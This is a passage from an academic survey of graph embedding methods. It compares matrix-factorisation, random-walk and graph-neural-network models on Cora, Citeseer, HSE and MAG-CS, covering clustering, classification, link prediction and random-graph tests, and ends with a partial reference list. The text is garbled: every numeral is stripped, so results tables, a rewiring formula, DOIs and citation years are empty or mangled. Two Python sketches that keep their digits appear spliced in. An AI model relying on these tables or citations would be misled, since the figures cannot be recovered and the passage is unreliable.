the rows correspond to different models, grouped by model type: matrix factorization, random walks, and graph neural networks with and without features. the columns show the results on the different datasets. for each dataset, we calculate two metrics: modularity and the silhouette score. the best results are highlighted.

in the node clustering task the results are quite intuitive: the embeddings that explicitly work with community structure perform best in terms of modularity. gemsec directly penalizes embeddings for a low modularity score through its k-means objective, while walklets captures this information by accounting for several levels of the node neighbourhood. the importance of such information is also supported by the comparatively high scores of the grarep model, which works similarly to walklets. graph neural networks with features give comparatively better results, meaning that node content helps to describe the graph structure. graphsage and gat efficiently utilize the local structure of the network; the main difference is that gat aggregates over the entire neighbourhood, whereas graphsage aggregates only over a fixed-size sample.

in the case of the mag cs graph (table ), the best results are achieved by gat and gcn. this means that for a large, heterogeneous graph the features play a major role. interestingly, gat without features works much better than the other structural models. this can be attributed to the attention mechanism, which selects only the most important neighbours when constructing a node embedding, and it seems that attention helps in this case to distinguish the heterogeneous nature of the edges. gnn models trained in an unsupervised fashion give poor results because they rely heavily on the features when constructing embeddings, even for learning the graph structure.

the clustering results show that task-specific losses can dramatically increase quality on a specific task. as we will see further, such losses are also helpful in the node classification task, since they preserve important graph properties.

node classification

the results on the node classification task are presented in table . the rows show the different types of models and the columns show the different datasets. for each dataset, we report accuracy for three different second-level models: gradient boosted machines, logistic regression and random forest. the best results are highlighted.

models that perform well in the node clustering task also show high scores in node classification. the labels in the given datasets correspond to different article topics, and since authors are usually dedicated to specific topics, natural communities form within these labels. this is also supported by the high modularity and assortativity coefficients of the label communities for all graphs. in the classification task it is also important to have a good separation of clusters, which can be measured by the silhouette coefficient; we can see that models that keep both modularity and silhouette high work better. linear models show comparatively lower scores, but for random-walk-based embeddings this difference is much less severe. most of the considered random-walk models are based on the skip-gram approach, which is a log-linear model. this reduces the expressiveness of the model but allows it to learn vectors that perform well with linear classifiers. the results for mag cs are presented in table .
firstly, we compare fewer models, because we were not able to compute some embeddings for such a large graph, so we choose the table results of model validation on node clustering task (both metrics lie between (− , ) and higher value means better results). bold corresponds to the best metric for each dataset. cora citeseer hse modularity silhouette modularity silhouette modularity silhouette grarep (cao, lu & xu, ) . . . . . . hope (ou et al., ) . . . . . . node vec (grover & leskovec, ) . . − . . . . diff vec (rozemberczki & sarkar, ) . . . . . . gemsec (rozemberczki et al., ) . . . . . . walklets (perozzi, kulkarni & skiena, ) . . . . . . gcn kipf & welling ( a) . . . . – – graphsage ( hamilton, ying & leskovec, a) . . . . – – gat (veličković et al., ) . . . . – – gcn (nf) − . . . . . . graphsage (nf) . . . . . . gat (nf) . . . . . . table results of model validation on node clustering task for mag-cs dataset (both metrics lie between (− , ) and higher value means better results). hope node vec grarep walklets gcn gat gcn (nf) gat (nf) modularity − . − . . . . . . . silhouette . . . . . − . . . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ fastest ones with good performance in other experiments. hope outperforms other classic non-attributed embeddings. it is also interesting that the linear mixture of embedding elements works much better for this embedding then others. one of the reasons for such behavior is that in the large graphs, embeddings could be noisy and simple models could give better quality. it could be also a reason for the worse performance of k-hop based embeddings (walklets and grarep). but the main driver in node classification quality is the features of nodes. it could be seen from the high results of gcn and gat models. hope has a dramatic difference between linear and non-linear models because it estimates katz centrality, which has non-linear nature. also, we use hope implementation from gem goyal & ferrara ( ), where node embedding is achieved as a concatenation of its self- and context-representations. the non-linear model helps to reconstruct the dot table results of model validation on node classification task (accuracy metric lies between ( , ) and higher value means better results). bold corresponds to the best metric for each dataset. gbm lr rf cora grarep (cao, lu & xu, ) . ± . . ± . . ± . hope (ou et al., ) . ± . . ± . . ± . m-nmf (wang et al., d) . ± . . ± . . ± . node vec (grover & leskovec, ) . ± . . ± . . ± . diff vec (rozemberczki & sarkar, ) . ± . . ± . . ± . gemsec (rozemberczki et al., ) . ± . . ± . . ± . walklets (perozzi, kulkarni & skiena, ) . ± . . ± . . ± . gcn (kipf & welling, a) . ± . . ± . . ± . graphsage (hamilton, ying & leskovec, a) . ± . . ± . . ± . gat (veličković et al., ) . ± . . ± . . ± . gcn (nf) . ± . . ± . . ± . graphsage (nf) . ± . . ± . . ± . gat (nf) . ± . . ± . . ± . citeseer grarep (cao, lu & xu, ) . ± . . ± . . ± . hope (ou et al., ) . ± . . ± . . ± . m-nmf (wang et al., d) . ± . . ± . . ± . node vec (grover & leskovec, ) . ± . . ± . . ± . diff vec (rozemberczki & sarkar, ) . ± . . ± . . ± . gemsec (rozemberczki et al., ) . ± . . ± . . ± . walklets (perozzi, kulkarni & skiena, ) . ± . . ± . . ± . gcn (kipf & welling, a) . ± . . ± . . ± . graphsage (hamilton, ying & leskovec, a) . ± . . ± . . ± . gat (veličković et al., ) . ± . . ± . . ± . gcn (nf) . ± . . ± . . ± . graphsage (nf) . ± . . ± . . ± . gat (nf) . ± . . ± . . ± . makarov et al. 
( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ product decoder. a similar argument can explain diversity in neural network models, but it has less variance because of high clustering efficiency. link prediction table shows results for link prediction task. it is separated into three groups by datasets. rows represent different graph embedding models and columns show different second- level classification models: gradient boosted machines, logistic regression and random forest. highlighted results are the best. in the link prediction task, we can also see the importance of clustering. links are more likely to occur within one community. the high-proximity models also work much better, because in that task we need to understand how similar are non-connected nodes. the performance of the hope model in this task is more significant. hope model concentrates on preserving asymmetric transitivity. the older paper can not cite the newer one. gcn without features performs much better than other graph neural networks. it accounts for the whole neighborhood and directly uses the adjacency matrix to train embeddings. results for mag cs (table ) are consistent with these findings. however, despite the good quality on the community clustering task, gat without features shows pure performance on the link prediction task. however, gcn without features is close to the gat with features. it means that in this task it is necessary to account the whole neighborhood. a dramatic difference in the quality of linear and non-linear models can be explained by the objective of the link prediction task. it requires to model the proximity between to nodes. such metrics are non-linear. so for reconstructing it from concatenated vectors of nodes, we need some non-linear transformations. graph visualization we present results of node clustering jointly with network visualization using umap technique. the results for three different datasets are shown at fig. for cora, fig. for citeseer, and fig. for hse datasets, respectively. table results of model validation on node classification task for mag-cs dataset (accuracy metric lies between ( , ) and higher value means better results). bold corresponds to the best metric for each dataset. gbm lr rf grarep (cao, lu & xu, ) . ± . . ± . . ± . hope (ou et al., ) . ± . . ± . . ± . node vec (grover & leskovec, ) . ± . . ± . . ± . walklets (perozzi, kulkarni & skiena, ) . ± . . ± . . ± . gcn (kipf & welling, a) . ± . . ± . . ± . gat (veličković et al., ) . ± . . ± . . ± . gcn (nf) . ± . . ± . . ± . gat (nf) . ± . . ± . . ± . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table results of model validation on link prediction task (accuracy metric lies between ( , ) and higher value means better results). bold corresponds to the best metric for each dataset. gbm lr rf cora grarep (cao, lu & xu, ) . ± . . ± . . ± . hope (ou et al., ) . ± . . ± . . ± . m-nmf (wang et al., d) . ± . . ± . . ± . node vec (grover & leskovec, ) . ± . . ± . . ± . diff vec (rozemberczki & sarkar, ) . ± . . ± . . ± . gemsec (rozemberczki et al., ) . ± . . ± . . ± . walklets (perozzi, kulkarni & skiena, ) . ± . . ± . . ± . gcn (kipf & welling ( a) . ± . . ± . . ± . graphsage (hamilton, ying & leskovec, a) . ± . . ± . . ± . gat (veličković et al., ) . ± . . ± . . ± . gcn (nf) . ± . . ± . . ± . graphsage (nf) . ± . . ± . . ± . gat (nf) . ± . . ± . . ± . 
citeseer grarep (cao, lu & xu, ) . ± . . ± . . ± . hope (ou et al., ) . ± . . ± . . ± . m-nmf (wang et al., d) . ± . . ± . . ± . node vec (grover & leskovec, ) . ± . . ± . . ± . diff vec (rozemberczki & sarkar, ) . ± . . ± . . ± . gemsec (rozemberczki et al., ) . ± . . ± . . ± . walklets (perozzi, kulkarni & skiena, ) . ± . . ± . . ± . gcn (kipf & welling, a) . ± . . ± . . ± . graphsage (hamilton, ying & leskovec, a) . ± . . ± . . ± . gat (veličković et al., ) . ± . . ± . . ± . gcn (nf) . ± . . ± . . ± . graphsage (nf) . ± . . ± . . ± . gat (nf) . ± . . ± . . ± . hse grarep (cao, lu & xu, ) . ± . . ± . . ± . hope (ou et al., ) . ± . . ± . . ± . m-nmf (wang et al. ( d) . ± . . ± . . ± . node vec (grover & leskovec, ) . ± . . ± . . ± . diff vec (rozemberczki & sarkar, ) . ± . . ± . . ± . gemsec (rozemberczki et al., ) . ± . . ± . . ± . walklets (perozzi, kulkarni & skiena, ) . ± . . ± . . ± . gcn (nf) (kipf & welling, a) . ± . . ± . . ± . graphsage (nf) (hamilton, ying & leskovec, a) . ± . . ± . . ± . gat (nf) (veličković et al., ) . ± . . ± . . ± . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the best visualization in terms of community structure seems to be walklets and grarep models, which give nicely distinguishable clusters in all the cases. both models work in the same way with k-hop similarity of vertices. gemsec also provides separate cluster picture but creates a lot of noisy points. interestingly, that hope also split graphs into several parts, but we can see by the modularity score, such parts are not correlated with node communities. such an effect could occur because hope embedding has non-homogeneous structure due to concatenation of self- and context-representations. in the case of graph neural networks, except for gat, all clusters have poor separation. such effect occurs because gnn weights neighborhood node attributes, so boundary nodes will be close. gat allows mitigating this problem because utilizes the attention mechanism, which weights meaningless node neighbors to zero. table results of model validation on link prediction task for mag-cs dataset (accuracy metric lies between ( , ) and higher value means better results). bold corresponds to the best metric for each dataset. gbm lr rf grarep (cao, lu & xu, ) . ± . . ± . . ± . hope (ou et al., ) . ± . . ± . . ± . node vec (grover & leskovec, ) . ± . . ± . . ± . walklets (perozzi, kulkarni & skiena, ) . ± . . ± . . ± . gcn (kipf & welling, a) . ± . . ± . . ± . gat (veličković et al., ) . ± . . ± . . ± . gcn (nf) . ± . . ± . . ± . gat (nf) . ± . . ± . . ± . figure umap projection of cora embeddings: (a) hope. (b) node vec. (c) diff vec. (d) grarep. (e) walklets. (f) gemsec. (g) m-nmf. (h) gcn. (i) graphsage. (j) gat. full-size doi: . /peerj-cs. /fig- makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ it seems that one of the most important graph property in the studied tasks is the community structure. so, most of the methods, that works with it directly allow to achieve the best scores. it is also connected to the level of proximity because it is indirectly connected with the community structure. the graph neural networks allow to easily catch node attributes, but miss most of graph properties information, so it performs on the level of baseline models without it. 
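the label-community statistics referred to throughout this discussion (the assortativity and label modularity also listed in the datasets table) can be computed directly from the ground-truth labels; the sketch below assumes a networkx graph and a dict mapping each node to its class, with illustrative names.

```python
# Sketch: assortativity and modularity of the ground-truth label communities.
# `G` is a networkx graph, `label_of` maps node -> class id (illustrative names).
import networkx as nx

def label_community_stats(G, label_of):
    nx.set_node_attributes(G, label_of, "label")
    assortativity = nx.attribute_assortativity_coefficient(G, "label")
    communities = [{v for v in G.nodes if label_of[v] == c}
                   for c in set(label_of.values())]
    modularity = nx.algorithms.community.modularity(G, communities)
    return assortativity, modularity
```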
random graphs in order to understand robustness of graph embeddings, we decided to test how modeling real-world network with random graphs impact on the quality of graph embeddings for simulated networks. firstly, we should explain the formation of random graphs in different models. erdös & rényi ( ) builds the graphs using a simple binomial rule for creating an edge with a given density of graph. barabási & albert ( ) starts from a small graph and sequentially adds a new node with a given density and connects existing nodes using preferential attachment rule. in the watts & strogatz ( ) model, the regular lattice is firstly constructed followed by edge rewiring procedure. we build random graphs regarding the properties of real-world graphs. to build er graph one need to have a number of nodes and edges in the graph. for the ba graph construction, it is required to have a number of nodes and number of edges for the newly added node at each iteration. it is a small integer, so we just select the best to fit the number of edges of benchmarks. the parameters of ws graphs were chosen based on the number of nodes, edges and average clustering of graphs following formulae: the number of edges in starting lattice is equal to k = [ # edges# nodes], the rewriting probability is equal to p ¼ � ffiffi ½ p � ðk � Þ= ðk � Þ � ðaverage clusteringÞ (barrat & weigt, ). figure umap projection of citeseer embeddings: (a) hope. (b) node vec. (c) diff vec. (d) grarep. (e) walklets. (f) gemsec. (g) m-nmf. (h) gcn. (i) graphsage. (j) gat. full-size doi: . /peerj-cs. /fig- makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ one of the main properties of all random graph models is the giant connected component. so embedding models learn it on the train part and works better than random in link prediction task in all cases. additionally, in the ba model, there are some nodes with much larger density than others, so it is easier to predict missed links. watts–strogatz also has a straightforward mechanism of edge construction, where the shortest path is small. in both ba and ws models it is also possible to reproduce community structure. we can see it by large modularity metric in the clustering task. random graph modeling is one of the efficient methods in network science for evaluation of different model properties. for example, comparison of real-graph with its random analog could help to understand how good is the received quality for the specific task. we follow this idea and compare two embeddings models walklets and hope. figure umap projection of hse embeddings: (a) hope. (b) node vec. (c) diff vec. (d) grarep. (e) walklets. (f) gemsec. (g) m-nmf. (h) gcn. (i) graphsage. (j) gat. full-size doi: . /peerj-cs. /fig- table results of model validation on node clustering task for random graphs (both metrics lie between (− , ) and higher value means better results. bold corresponds to the best metric for each dataset. hope walklets modularity silhouette modularity silhouette cora (original) . . . . cora (barabási-albert) . . . . cora (erdős-rényi) − . . . . cora (watts-strogatz) . . . . citeseer (original) . . . . citeseer (barabási-albert) − . . . − . citeseer (erdős-rényi) . . − . . citeseer (watts-strogatz) . . . . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. 
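the three random analogues can be generated with networkx so that they match the node and edge counts of a real benchmark graph; in the sketch below the ba parameter and the ws lattice degree are fitted to the edge count as described above, while the ws rewiring probability `ws_p` is assumed to have been pre-computed from the average clustering via the barrat & weigt relation (names and rounding choices are illustrative).

```python
# Sketch: Erdos-Renyi, Barabasi-Albert and Watts-Strogatz analogues of a real
# graph `G`, matched by node and edge counts. `ws_p` is the rewiring
# probability chosen to reproduce the average clustering coefficient.
import networkx as nx

def random_analogues(G, ws_p, seed=0):
    n, m = G.number_of_nodes(), G.number_of_edges()
    er = nx.gnm_random_graph(n, m, seed=seed)          # fixed number of nodes/edges
    ba_m = max(1, round(m / n))                        # edges per newly added node
    ba = nx.barabasi_albert_graph(n, ba_m, seed=seed)  # preferential attachment
    ws_k = max(2, 2 * round(m / n))                    # ring-lattice degree ~ 2m/n
    ws = nx.watts_strogatz_graph(n, ws_k, ws_p, seed=seed)
    return er, ba, ws
```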
https://peerj.com/computer-science/ table results of model validation on link prediction task for random graphs (accuracy metric lies between ( , ) and higher value means better results). bold corresponds to the best metric for each dataset. rf lr gbm walklets cora original . ± . . ± . . ± . cora-er . ± . . ± . . ± . cora-ba . ± . . ± . . ± . cora-ws . ± . . ± . . ± . citeseer original . ± . . ± . . ± . citeseer-er . ± . . ± . . ± . citeseer-ba . ± . . ± . . ± . citeseer-ws . ± . . ± . . ± . hope cora original . ± . . ± . . ± . cora-er . ± . . ± . . ± . cora-ba . ± . . ± . . ± . cora-ws . ± . . ± . . ± . citeseer original . ± . . ± . . ± . citeseer-er . ± . . ± . . ± . citeseer-ba . ± . . ± . . ± . citeseer-ws . ± . . ± . . ± . figure umap projection of citeseer based random graph embeddings: (a) original graph, hope. (b) erdős-rényi, hope. (c) barabási- albert, hope. (d) watts-strogatz, hope. (e) original graph, walklets. (f) erdős-rényi, walklets. (g) barabási-albert, walklets. (h) watts- strogatz, walklets. full-size doi: . /peerj-cs. /fig- makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we select these embeddings because it is non-context, show good performance and saves different properties. walklets preserves k-hop similarity and hope preserves asymmetric transitivity. similarly to the experiments on the real-world graphs, walklets shows superior performance in comparison to the hope in clustering (table ) and lpp (table ) tasks. however, visually (figs. and ) it better separates dense clusters. the walklets visualization of random graphs differs from real-world cases. random graphs give much sparser and visually harder to distinguish structure. the results on random graphs and real networks differ sufficiently. it means that embedding models could really learn graph structure and its properties. also, such citation networks are poorly described by random graph models. conclusion in the current work, we present a comprehensive survey of graph embedding techniques. the work overviews different types of graph embeddings with respect to methods, network types, their applications to computer science domains. one of the main achievements at the moment are the scalable models. the gnn could be trained in batch and distributed fashion. such methods allow using powerful attribute- aware models for real-world large graphs. however, only a few works analyze the proper strategies for batch sampling and its effect on the final results in terms of bias-variance trade-off. another way to accelerate gnn training is to coarse a graph, but it could affect figure umap projection of cora based random graph embeddings: (a) original graph, hope. (b) erdős-rényi, hope. (c) barabási- albert, hope. (d) watts-strogatz, hope. (e) original graph, walklets. (f) erdős-rényi, walklets. (g) barabási-albert, walklets. (h) watts-strogatz, walklets. full-size doi: . /peerj-cs. /fig- makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ dramatically the final quality of the model. so, the understanding and further developing of coarsening and sampling techniques is the promising direction. one of the most popular technique for graph embedding at the current time is the attention mechanism. 
it helps to account for some significant properties of a graph like temporality and heterogeneity by introducing attention in different dimensions: time, different levels of edge and nodes types. however, this method could be exhaustive in terms of computation, so it should be used with acceleration techniques. the other research direction that grows rapidly is the stability of graph embeddings. the popular practices are to use variational graph autoencoders with gaussian denoising or adversarial training. the development of scalable and high-quality graph neural networks leads to an increase in the number of applications to the non-graph domain. the most common application of it is the modeling of similarity or nearest neighbors graphs. such approaches are presented in natural language processing, computer vision and recommender systems. however, in many fields, structures could be natively presented as graphs in terms of labels (samples of one type are connected), interaction, knowledge or relation graphs. our survey covers the most complete of methods and application in different computer science domains related to machine learning problems on relational data. in addition, in the experiment part of the study we provide results on training best graph embedding models for node classification, link prediction, node clustering and network visualization tasks for different types of models and graphs to understand why certain graph embedding perform better than others on benchmark datasets under different training settings. our experiments explain how different embeddings work with different properties uncovering graph inner properties and descriptive statistics impact on the models performance. as one of the most interesting findings, we show that structural embeddings with proper objectives achieve competitive quality vs graph neural networks. still, it could be hard to apply such methods to large graphs. firstly, there is a problem with high computational complexity. graph neural networks solve this issue by using batch training and sampling techniques. another problem is that learned structural embeddings for large graphs could be noisy. however, adding the node attributes helps to concentrate on the specific important properties. modern models focus on accounting for node attributes, but it was found that more important question is how to balance a trade-off between node attributes and network structure. our work will be helpful in the further development of such generalization methods to answer this question. such methods will allow to easily apply graph models in different domains. additional information and declarations funding the work of nikita nikitinsky on section was supported by the russian science foundation grant - - . the oa fee was covered under support of faculty of computer science, hse university. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ grant disclosures the following grant information was disclosed by the authors: russian science foundation: - - . faculty of computer science, hse university. competing interests the authors declare that they have no competing interests. 
author contributions � ilya makarov conceived and designed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � dmitrii kiselev conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � nikita nikitinsky conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. � lovro subelj conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: metric evaluation code for each of the presented tasks is available in the supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abdelaziz i, fokoue a, hassanzadeh o, zhang p, sadoghi m. . large-scale structural and textual similarity-based mining of knowledge graph to predict drug-drug interactions. journal of web semantics : – doi . /j.websem. . . . abu-el-haija s, perozzi b, al-rfou r. . learning edge representations via low-rank asymmetric projections. in: proceedings of the acm on conference on information and knowledge management. acm, – . abu-el-haija s, perozzi b, al-rfou r, alemi aa. . watch your step: learning node embeddings via graph attention. in: advances in neural information processing systems. – . adafre sf, de rijke m. . discovering missing links in wikipedia. in: proceedings of the rd international workshop on link discovery, linkkdd ’ . new york: acm, – . adamic la, adar e. . friends and neighbors on the web. social networks ( ): – doi . /s - ( ) - . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /j.websem. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ahmed a, shervashidze n, narayanamurthy s, josifovski v, smola aj. . distributed large-scale natural graph factorization. in: proceedings of the nd international conference on world wide web. acm, – . akyildiz ta, aljundi aa, kaya k. . gosh: embedding big graphs on small hardware. in: th international conference on parallel processing—icpp, icpp ’ . new york: association for computing machinery. alanis-lobato g, mier p, andrade-navarro ma. . efficient embedding of complex networks to hyperbolic space via their laplacian. scientific reports ( ): doi . /srep . alshahrani m, khan ma, maddouri o, kinjo ar, queralt-rosinach n, hoehndorf r. . neuro-symbolic representation learning on biological knowledge graphs. bioinformatics ( ): – doi . /bioinformatics/btx . as feder t, motwani r. . clique partitions, graph compression, and speeding-up algorithms. in: proceedings of the rd annual acm symposium on the theory of computing. new york: acm, – . atahan akyildiz t, alabsi aljundi a, kaya k. . understanding coarsening for embedding large-scale graphs. arxiv preprint arxiv: . . atwood j, towsley d. . diffusion-convolutional neural networks. in: advances in neural information processing systems. – . azran a. . 
the rendezvous algorithm: multiclass semi-supervised learning with markov random walks. in: proceedings of the th international conference on machine learning. new york: acm, – . backstrom l, leskovec j. . supervised random walks: predicting and recommending links in social networks. in: proceedings of the fourth acm international conference on web search and data mining, wsdm ’ . new york: acm, – . baldini l, martino a, rizzi a. . exploiting cliques for granular computing-based graph classification. in: international joint conference on neural networks (ijcnn). piscataway: ieee, – . baluja s, seth r, sivakumar d, jing y, yagnik j, kumar s, ravichandran d, aly m. . video suggestion and discovery for youtube: taking random walks through the view graph. in: proceedings of the th international conference on world wide web. new york: acm, – . banerjee s, khapra mm. . graph convolutional network with sequential attention for goal-oriented dialogue systems. transactions of the association for computational linguistics ( ): – doi . /tacl_a_ . barabási a-l, albert r. . emergence of scaling in random networks. science ( ): – doi . /science. . . . barrat a, weigt m. . on the properties of small-world network models. european physical journal b-condensed matter and complex systems ( ): – doi . /s . belkin m, niyogi p. . laplacian eigenmaps and spectral techniques for embedding and clustering. in: advances in nips. cambridge: mit press, – . berg rv d, kipf tn, welling m. . graph convolutional matrix completion. arxiv preprint arxiv: . . bhagat s, cormode g, muthukrishnan s. . node classification in social networks. in: social network data analytics. berlin: springer, – . bhagat s, cormode g, rozenbaum i. . applying link-based classification to label blogs. in: advances in web mining and web usage analysis. berlin: springer, – . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /srep http://dx.doi.org/ . /bioinformatics/btx https://arxiv.org/abs/ . http://dx.doi.org/ . /tacl_a_ http://dx.doi.org/ . /science. . . http://dx.doi.org/ . /s https://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ bojcheski a, günnemann s. . adversarial attacks on node embeddings. arxiv preprint arxiv: . . bordes a, glorot x, weston j, bengio y. . joint learning of words and meaning representations for open-text semantic parsing. in: artificial intelligence and statistics. cambridge: pmlr, mit press, – . bordes a, usunier n, garcia-duran a, weston j, yakhnenko o. . translating embeddings for modeling multi-relational data. in: advances in neural information processing systems. cambridge: mit press, – . bordes a, weston j, collobert r, bengio y. . learning structured embeddings of knowledge bases. in: twenty-fifth aaai conference on artificial intelligence. aaai, – . brand m. . continuous nonlinear dimensionality reduction by kernel eigenmaps. in: ijcai. – . brochier r, guille a, velcin j. . global vectors for node representations. arxiv preprint arxiv: . . bronstein mm, bruna j, lecun y, szlam a, vandergheynst p. . geometric deep learning: going beyond euclidean data. ieee signal processing magazine ( ): – doi . /msp. . . bruna j, zaremba w, szlam a, lecun y. . spectral networks and locally connected networks on graphs. arxiv preprint arxiv: . . cai h, zheng vw, chang kc-c. . a comprehensive survey of graph embedding: problems, techniques and applications. arxiv preprint arxiv: . . cao m, ma x, zhu k, xu m, wang c. . 
heterogeneous information network embedding with convolutional graph attention networks. in: international joint conference on neural networks (ijcnn). piscataway: ieee, – . cao s, lu w, xu q. . grarep: learning graph representations with global structural information. in: proceedings of the th acm international on conference on information and knowledge management. new york: acm, – . cao s, lu w, xu q. . deep neural networks for learning graph representations. in: aaai. – . cavallari s, zheng vw, cai h, chang kc-c, cambria e. . learning community embedding with community detection and node embedding on graphs. in: proceedings of the acm on conference on information and knowledge management. new york: acm, – . Çelikkanat a, malliaros fd. . exponential family graph embeddings. arxiv preprint arxiv: . . chamberlain bp, clough j, deisenroth mp. . neural embeddings of graphs in hyperbolic space. arxiv preprint arxiv: . . chang j, blei d. . relational topic models for document networks. in: artificial intelligence and statistics. – . chang s, han w, tang j, qi g-j, aggarwal cc, huang ts. . heterogeneous network embedding via deep architectures. in: proceedings of the th acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – . chen c, min z, liu y, ma s. a. social attentional memory network: modeling aspect- and friend-level differences in recommendation. in: proceedings of the twelfth acm international conference on web search and data mining. new york: acm, – . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://arxiv.org/abs/ . https://arxiv.org/abs/ . http://dx.doi.org/ . /msp. . https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ chen c-m, chien p-c, lin y-c, tsai m-f, yang y-h. a. exploiting latent social listening representations for music recommendations. in: proceedings of the ninth acm international conference recommender systems poster. – . chen c-m, tsai m-f, lin y-c, yang y-h. a. query-based music recommendations via preference embedding. in: proceedings of the th acm conference on recommender systems. new york: acm, – . chen h, anantharam ar, skiena s. . deepbrowse: similarity-based browsing through large lists. in: international conference on similarity search and applications. berlin: springer, – . chen h, koga h. . gl vec: graph embedding enriched by line graphs with edge features. in: gedeon t, wong kw, lee m, eds. neural information processing. cham: springer international publishing, – . chen h, li x, huang z. . link prediction approach to collaborative filtering. in: proceedings of the th acm/ieee-cs joint conference on digital libraries (jcdl ’ ). new york: acm, – . chen h, perozzi b, al-rfou r, skiena s. a. a tutorial on network embeddings. arxiv preprint arxiv: . . chen h, perozzi b, hu y, skiena s. b. harp: hierarchical representation learning for networks. in: thirty-second aaai conference on artificial intelligence. – . chen j, ma t, xiao c. . fastgcn: fast learning with graph convolutional networks via importance sampling. arxiv preprint arxiv: . . chen j, shi z, wu y, xu x, zheng h. c. link prediction adversarial attack. arxiv preprint arxiv: . . chen j, wu y, lin x, xuan q. b. can adversarial network attack be defended? arxiv preprint arxiv: . . chen j, wu y, xu x, chen y, zheng h, xuan q. e. fast gradient attack on network embedding. arxiv preprint arxiv: . . chen j, zhang a. . 
hgmf: heterogeneous graph-based fusion for multimodal data with incompleteness. in: proceedings of the th acm sigkdd international conference on knowledge discovery & data mining, kdd ’ . new york: association for computing machinery, – . chen j, zhang q, huang x. b. incorporate group information to enhance network embedding. in: proceedings of the th acm international on conference on information and knowledge management. new york: acm, – . chen j, zhu j, song l. . stochastic training of graph convolutional networks with variance reduction. arxiv preprint arxiv: . . chen m, tsang iw, tan m, cham tj. b. a unified feature selection framework for graph embedding on high dimensional data. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . . chen t, sun y. . task-guided and path-augmented heterogeneous network embedding for author identification. in: proceedings of the tenth acm international conference on web search and data mining. new york: acm, – . chen y, rohrbach m, yan z, shuicheng y, feng j, kalantidis y. c. graph-based global reasoning networks. in: the ieee conference on computer vision and pattern recognition (cvpr). piscataway: ieee. makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/ . http://dx.doi.org/ . /tkde. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ chen y, sun k, pu j, xiong z, zhang x. . grapasa: parametric graph embedding via siamese architecture. information sciences : – doi . /j.ins. . . . cheng w, zhang x, guo z, wu y, sullivan pf, wang w. . flexible and robust co-regularized multi-domain graph clustering. in: proceedings of the th acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – . chiang w-l, liu x, si s, li y, bengio s, hsieh c-j. . cluster-gcn: an efficient algorithm for training deep and large graph convolutional networks. in: proceedings of the th acm sigkdd international conference on knowledge discovery & data mining. – . cho h, yu y. . link prediction for interdisciplinary collaboration via co-authorship network. social network analysis and mining ( ): doi . /s - - - . chung fr, graham fc. . spectral graph theory. vol. . rhode island: american mathematical soc. clauset a, moore c, newman me. . hierarchical structure and the prediction of missing links in networks. nature ( ): – doi . /nature . cobanoglu mc, liu c, hu f, oltvai zn, bahar i. . predicting drug-target interactions using probabilistic matrix factorization. journal of chemical information and modeling ( ): – doi . /ci z. crichton g, guo y, pyysalo s, korhonen a. . neural networks for link prediction in realistic biomedical graphs: a multi-dimensional evaluation of graph embedding-based approaches. bmc bioinformatics ( ): doi . /s - - - . cui p, wang x, pei j, zhu w. . a survey on network embedding. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . . dai h, dai b, song l. . discriminative embeddings of latent variable models for structured data. in: international conference on machine learning. new york: acm, – . dai h, li h, tian t, huang x, wang l, zhu j, song l. . adversarial attack on graph structured data. arxiv preprint arxiv: . . de oliveira mf, levkowitz h. . from visual data exploration to visual data mining: a survey. ieee transactions on visualization and computer graphics ( ): – doi . /tvcg. . . 
